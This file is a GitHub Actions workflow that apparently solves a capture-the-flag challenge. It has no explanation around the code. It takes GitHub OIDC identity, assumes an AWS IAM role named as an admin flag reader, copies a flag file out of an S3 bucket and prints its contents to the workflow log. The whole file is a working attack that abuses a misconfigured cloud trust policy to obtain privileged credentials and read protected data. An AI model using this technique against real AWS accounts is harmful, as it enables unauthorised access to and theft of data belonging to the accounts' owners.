name: Get Real Flag
on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  pwn:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Configure AWS via OIDC and read real flag
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875
          role-session-name: GHA-FlagRead-${{ github.run_id }}
          aws-region: ap-southeast-1

      - name: Show aws identity (debug)
        run: aws sts get-caller-identity || true

      - name: Read real flag
        run: |
          set -x
          aws s3 cp s3://oh-i-really-do-care/flag.txt ./real_flag.txt || true
          echo "---- BEGIN FLAG ----"
          sed -n '1,200p' real_flag.txt || true
          echo "-----  END FLAG  -----"
